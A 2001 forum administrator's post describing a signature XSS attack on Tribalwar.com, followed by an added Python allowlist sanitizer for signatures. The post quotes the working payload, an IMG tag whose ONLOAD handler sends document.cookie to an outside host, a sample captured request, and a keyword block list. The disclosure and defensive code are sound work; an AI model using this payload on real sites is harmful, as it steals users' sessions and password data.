The following is a post I made in our forums at Tribalwar.com after a hacking attempt tonight:
Posted 08-01-2001 12:05 AM
--------------------------------------------------------------------------------
Tonight the user daerid set up a piece of javascript code which allowed him to steal the passwords to private forums of everyone who read a specific thread and an encrypted version of each user's password. This code will pop open a new window and request a specific page from the 64.32.63.7 host server. While this page will not exist, a log can be kept of all such requests. This will pass all the contents of our site's cookie the user has via the request. This means that this user (daerid) now has a record of each person's userid and userpassword in an encrypted form who viewed this thread. Also, if that user had access to any of our private forums he will have an unencrypted view of those passwords.
Here is the offending code, placed in his signature:
<IMG SRC="http://64.32.63.7/images/clear.gif" HEIGHT=1 WIDTH=1 ONLOAD="open('http://64.32.63.7:83/twstuff/?twcookie='+escape(document.cookie),'','top=5000,left=5000' );self.focus();">
Here is a sample of the request that would be sent:
http://64.32.63.7:83/twstuff/?twcookie=bbstyleid=3;%20bbforumpass[63]=removedpassword;%20bblastvisit=996471155;%20bbuserid=4;%20bbpassword=83e4e22d6afc296a2df4e9a6d3;%20sessionhash=db335a9e8fce257f02a9b9a8c661fd24;%20bbthreadview[63253]=996636210
The "removedpassword" would be stored in plain text and would be easy to link to each individual private forum.
Assuming Daerid has access to the 64.32.63.7 server he will have a list of encrypted passwords for whoever viewed the thread. He may be unable to decrypt the passwords and thus resetting may be unnecessary. The choice is up to the individual user. We STRONGLY recommend that anyone who viewed the "Word" thread in which this code was placed reset their password. If you are unsure if you viewed this thread, the safest course is to reset your password anyway.
--------------------------------------------------------------------------------
We have since added the ONLOAD and document.cookie keywords to our list of censored text.
The private forums are our own hack to vBulletin and we do not send the private forum pass encrypted, an oversight by our coder which we will remedy of course. This will give the user a list of encrypted passwords to each user. There does exist however the possibility of the userpass being decrypted.
I'm hoping I'm flawed somewhere in my understanding of this hack but it looks straightforward. Can someone comment on how hard it would be to crack a userpassword gained in this manner? vBulletin isn't my area of expertise on our site; are passwords encoded differently each session? I hope that is the case!
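An allowlist sanitizer for user signatures, added here as an example and not vBulletin's or Tribalwar's code: rather than censoring the words ONLOAD and document.cookie, it rebuilds each signature from a short list of permitted tags and attributes, so no event-handler attribute and no non-http(s) URL can survive whatever spelling or casing is used. The tag and attribute allowlist is an assumption chosen for this example; it is run against the signature quoted above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist (assumed for this example): anything not named here is dropped.
ALLOWED_TAGS = {"b", "i", "u", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "width", "height", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https"}

# The signature from the post above (a space added before HEIGHT for readability).
SIGNATURE_FROM_POST = (
    '<IMG SRC="http://64.32.63.7/images/clear.gif" HEIGHT=1 WIDTH=1 '
    'ONLOAD="open(\'http://64.32.63.7:83/twstuff/?twcookie=\'+escape(document.cookie),'
    '\'\',\'top=5000,left=5000\' );self.focus();">'
)

class SignatureSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()  # tag and attribute names arrive lowercased
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; any inner text is still escaped below
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler, not just "onload"
            if name in ("href", "src") and urlparse(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                continue  # only http(s) links and images survive
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    handle_startendtag = handle_starttag

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize_signature(raw_html):
    """Return the signature rebuilt from allowed tags and attributes only."""
    p = SignatureSanitizer()
    p.feed(raw_html)
    p.close()
    return "".join(p.out)
```

Run on the quoted signature, the 1x1 image itself is kept but the ONLOAD handler is gone, so nothing executes when the thread is viewed.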